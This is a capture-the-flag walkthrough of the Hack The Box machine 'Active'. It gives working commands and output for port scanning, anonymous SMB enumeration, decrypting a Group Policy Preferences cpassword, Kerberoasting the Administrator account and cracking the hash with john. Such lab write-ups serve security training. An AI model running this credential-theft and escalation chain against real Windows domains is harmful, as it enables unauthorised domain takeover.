Summary
There is anonymous Access to smb share
Since the server is windows 2008, groups.xml in policy contains password for a user.
It can be decrypted using gpp-decrypt
Checking for the admin account. The account can be kerberoasted using the svc_tgs account.
Walkthrough
Enumration
Let’s start with scanning.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
argenestel@parrot ~/Desktop/hackthebox/active rustscan 10.10.10.100
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/argenestel/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitiv
e servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up
the Ulimit with '--ulimit 5000'.
Open 10.10.10.100:53
Open 10.10.10.100:88
Open 10.10.10.100:135
Open 10.10.10.100:139
Open 10.10.10.100:389
Open 10.10.10.100:445
Open 10.10.10.100:464
Open 10.10.10.100:593
Open 10.10.10.100:636
Open 10.10.10.100:3269
Open 10.10.10.100:3268
Open 10.10.10.100:5722
Open 10.10.10.100:9389
Open 10.10.10.100:49152
Open 10.10.10.100:49153
Open 10.10.10.100:49154
Open 10.10.10.100:49155
Open 10.10.10.100:49157
Open 10.10.10.100:49158
Open 10.10.10.100:49169
Open 10.10.10.100:49172
Open 10.10.10.100:49182
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 53,88,135,139,389,445,464,593,636,3269,3268,5722,9389,49152
,49153,49154,49155,49157,49158,49169,49172,49182 10.10.10.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 09:39 IST
Initiating Ping Scan at 09:39
Scanning 10.10.10.100 [2 ports]
Completed Ping Scan at 09:39, 0.26s elapsed (1 total hosts)
Initiating Connect Scan at 09:39
Scanning active.htb (10.10.10.100) [22 ports]
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 49182/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49169/tcp on 10.10.10.100
Discovered open port 49172/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Completed Connect Scan at 09:39, 0.49s elapsed (22 total ports)
Nmap scan report for active.htb (10.10.10.100)
Host is up, received conn-refused (0.25s latency).
Scanned at 2020-11-01 09:39:37 IST for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5722/tcp open msdfsr syn-ack
9389/tcp open adws syn-ack
49152/tcp open unknown syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49155/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
49158/tcp open unknown syn-ack
49169/tcp open unknown syn-ack
49172/tcp open unknown syn-ack
49182/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds
Running Default scripts.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
argenestel@parrot ~/Desktop/hackthebox/active/nmap cat active
# Nmap 7.80 scan initiated Sun Nov 1 09:52:53 2020 as: nmap -vvv -p 53,88,135,139,389,445,464,593,636,3269,3268,5722,9389,49152,49153,49154,49155,49157,49158,49169,49172,49182 -sC -sV -oN nmap/active 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up, received conn-refused (0.25s latency).
Scanned at 2020-11-01 09:52:53 IST for 199s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-11-01 04:27:05Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5722/tcp open msrpc syn-ack Microsoft Windows RPC
9389/tcp open mc-nmf syn-ack .NET Message Framing
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49169/tcp open msrpc syn-ack Microsoft Windows RPC
49172/tcp open msrpc syn-ack Microsoft Windows RPC
49182/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m01s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24711/tcp): CLEAN (Couldn't connect)
| Check 2 (port 40109/tcp): CLEAN (Couldn't connect)
| Check 3 (port 29284/udp): CLEAN (Failed to receive data)
| Check 4 (port 38631/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-01T04:28:04
|_ start_date: 2020-11-01T04:11:17
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 1 09:56:12 2020 -- 1 IP address (1 host up) scanned in 199.35 seconds
Domain port 53
from nmap, the domain is active.htb adding it into /etc/hosts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
argenestel@parrot ~/Desktop/hackthebox/active dig 10.10.10.100 @10.10.10.100
; <<>> DiG 9.16.6-Debian <<>> 10.10.10.100 @10.10.10.100
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 295
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 4c963f3d36e16cb0 (echoed)
;; QUESTION SECTION:
;10.10.10.100. IN A
;; Query time: 275 msec
;; SERVER: 10.10.10.100#53(10.10.10.100)
;; WHEN: Sun Nov 01 10:42:24 IST 2020
;; MSG SIZE rcvd: 53
Nothing Interesting Moving to smb
SMB Port
running enum4linux returned nothing so leaving the output moving on to check which shares are accessable to normal user.
1
2
3
4
5
6
7
8
9
10
11
smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Reading Replication is possible.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
argenestel@parrot ~/Desktop/hackthebox/active/nmap smbclient \\\\10.10.10.100/Replication
Enter WORKGROUP\argenestel's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
active.htb D 0 Sat Jul 21 16:07:44 2018
ls -la
10459647 blocks of size 4096. 4925385 blocks available
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
DfsrPrivate DHS 0 Sat Jul 21 16:07:44 2018
Policies D 0 Sat Jul 21 16:07:44 2018
scripts D 0 Thu Jul 19 00:18:57 2018
10459647 blocks of size 4096. 4925385 blocks available
smb: \active.htb\> recurse
smb: \active.htb\> ls
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
DfsrPrivate DHS 0 Sat Jul 21 16:07:44 2018
Policies D 0 Sat Jul 21 16:07:44 2018
scripts D 0 Thu Jul 19 00:18:57 2018
\active.htb\DfsrPrivate
. DHS 0 Sat Jul 21 16:07:44 2018
.. DHS 0 Sat Jul 21 16:07:44 2018
ConflictAndDeleted D 0 Thu Jul 19 00:21:30 2018
Deleted D 0 Thu Jul 19 00:21:30 2018
Installing D 0 Thu Jul 19 00:21:30 2018
\active.htb\Policies
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 16:07:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 16:07:44 2018
\active.htb\scripts
. D 0 Thu Jul 19 00:18:57 2018
.. D 0 Thu Jul 19 00:18:57 2018
\active.htb\DfsrPrivate\ConflictAndDeleted
. D 0 Thu Jul 19 00:21:30 2018
.. D 0 Thu Jul 19 00:21:30 2018
\active.htb\DfsrPrivate\Deleted
. D 0 Thu Jul 19 00:21:30 2018
.. D 0 Thu Jul 19 00:21:30 2018
\active.htb\DfsrPrivate\Installing
. D 0 Thu Jul 19 00:21:30 2018
.. D 0 Thu Jul 19 00:21:30 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GPT.INI A 23 Thu Jul 19 02:16:06 2018
Group Policy D 0 Sat Jul 21 16:07:44 2018
MACHINE D 0 Sat Jul 21 16:07:44 2018
USER D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GPT.INI A 22 Thu Jul 19 00:19:12 2018
MACHINE D 0 Sat Jul 21 16:07:44 2018
USER D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GPE.INI A 119 Thu Jul 19 02:16:06 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Microsoft D 0 Sat Jul 21 16:07:44 2018
Preferences D 0 Sat Jul 21 16:07:44 2018
Registry.pol A 2788 Thu Jul 19 00:23:45 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
. D 0 Thu Jul 19 00:19:12 2018
.. D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Microsoft D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
. D 0 Thu Jul 19 00:19:12 2018
.. D 0 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Windows NT D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Windows NT D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
SecEdit D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
Groups.xml A 533 Thu Jul 19 02:16:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
SecEdit D 0 Sat Jul 21 16:07:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GptTmpl.inf A 1098 Thu Jul 19 00:19:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 16:07:44 2018
.. D 0 Sat Jul 21 16:07:44 2018
GptTmpl.inf A 3722 Thu Jul 19 00:19:12 2018
10459647 blocks of size 4096. 4925385 blocks available
groups.xml looks Interestin.
1
2
3
4
argenestel@parrot ~/Desktop/hackthebox/active/nmap cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
SVC_TGS is username. Okay so I can see cpassword and searching about it, can be decrypted using gpp-decrypt.
Exploitation
User SVC_TGS
1
2
3
argenestel@parrot ~/Desktop/hackthebox/active/nmap gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
<redacted>
Here we go moving on to what we can do.
argenestel@parrot ~/Desktop/hackthebox/active/nmap smbmap -u SVC_TGS -p
Users share will give user.txt
Moving on to administrator
can i kerberoast administrator?
Trying out few random things lead me to this conclusion.
- biggest spoiler from PayloadsAllTheThings.
Administrator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
argenestel@parrot ~/Desktop/hackthebox/active/nmap GetUserSPNs.py active.htb/SVC_TGS:<redacted> -dc-ip 10.10.10.100 -request
/home/argenestel/.local/lib/python2.7/site-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer suppo
rted by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
from cryptography import x509
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- ----------
---------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2018-07-30
22:47:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$0c46bb20097739b1bfe26fee14b7a298$594d843b64492268a7cc09da5a7679234dcb9cd4eb63c
01b5f91bade59f0f73f79717fa02ece84219b8fdd4bb4ed06c0a8dec3209bab143f2039fcc9c4b6b7027355d64855bafd19815682ae041faa5f222ba90c3de9341efc
898d153e3bcfa060499f4928304d26227a27c64edb8a3e9acc86d5332cc4d96245138c7f7120a82de23bd320e5fa158f41b1988371851b9d141ef37f06b10c1684c5e
84c02e0cbe5bb39560ae386c5429b0bc3a2fbb54c5ab71b986f8a8ddae91be1fd230b158d7b5293604adc70d9660843c
....<continue>
Alright we get krb hash let’s check if we can crack it and get administrator
1
2
3
4
5
6
7
8
9
10
✘ argenestel@parrot ~/Desktop/hackthebox/active/nmap john --wordlist=/usr/share/wordlists/rockyou.txt admin.spn
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<redacted> (?)
1g 0:00:00:12 DONE (2020-11-01 14:32) 0.07936g/s 836347p/s 836347c/s 836347C/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
argenestel@parrot ~/Des
Done….
We can extract administrator root.txt by loging into psexec or smb.
1
2
3
4
5
6
7
8
9
10
11
[+] IP: 10.10.10.100:445 Name: active.htb
[/] Work[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\NERGHTUYIV, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY